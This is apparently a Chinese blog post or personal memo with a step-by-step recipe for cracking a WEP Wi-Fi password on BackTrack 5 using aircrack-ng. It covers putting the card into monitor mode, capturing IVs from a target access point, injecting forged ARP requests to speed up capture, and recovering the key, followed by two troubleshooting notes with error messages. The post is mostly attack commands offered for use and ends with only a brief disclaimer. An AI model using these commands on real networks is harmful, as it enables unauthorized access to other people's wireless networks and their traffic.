最近無意中接觸到了一些無線方面的技術資料,又發現了一個比較速度的wifi***方法,這個雖然沒有reaver那麼穩定,個人覺得在時間方面要比reaver快的多。可能做實驗的筆記本太舊的原因,途中遇到幾個問題,如果有同仁遇到,還請指點一二。此處先記錄下這幾條主要命令備忘。
環境是BT5,默認安裝了較高版本,所以不用升級,但還是附上安裝命令:
wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf <name of source file>
cd aircrack-ng-XXX
make
make install
下面就拿WEP加密做示例:
查看無線網卡,一般默認是wlan0,如果有外置或其他無線網卡,那就選擇相應的網卡啓用即可。
單獨查看無線網卡信息:iwconfig
啓用無線網卡:ifconfig wlan0 up
激活網卡至監聽(monitor)模式:
airmon-ng start wlan0
掃描當前地點無線網絡信息:
airodump-ng mon0
開始抓包,保存爲logas前綴的.ivs後綴,6爲AP的頻道
airodump-ng --ivs -w longas -c 6 wlan0
在上條命令運行的情況下,打開一個新的終端窗口,輸入下面命令對目標AP進行ArpRequest注入***,這樣採用了一種稱之爲ArpRequest的方式來讀取ARP請求報文,並僞造大量的報文再次重發出去,以便刺激AP產生更多的數據包,從而加快破解過程。
aireplay-ng -3 -b AP-mac -h Client-mac mon0
當IVs值達到2萬以上,可嘗試下面命令破解
aircrack-ng 捕獲的IVS文件
破解成功後,KEYFOUND!後面的ACSI碼就是密碼
PS:
問題1:
當在新窗口輸入airodump-ng --ivs -w longas -c 6 wlan0時,遇到了報錯:
ioctl(SIOCSWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,
AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make
Sysfs injection support was not found either.
我嘗試的方法是使用命令:
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up sudo iwconfig wlan0
sudo airmon-ng start wlan0 airodump-ng --ivs -w longas -c 6 wlan0
就可以了
問題2:
aireplay-ng -3 -b AP-mac -h Client-mac mon0時,出現了錯誤:
Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
因爲這條命令並不直接影響結果,暫時也沒找到合適解決方法,如果各位有好的解決方法,請指點。
這裏只簡單的列出了主要用到的命令,僅供實驗參考,不得用於非法操作,否則後果自負。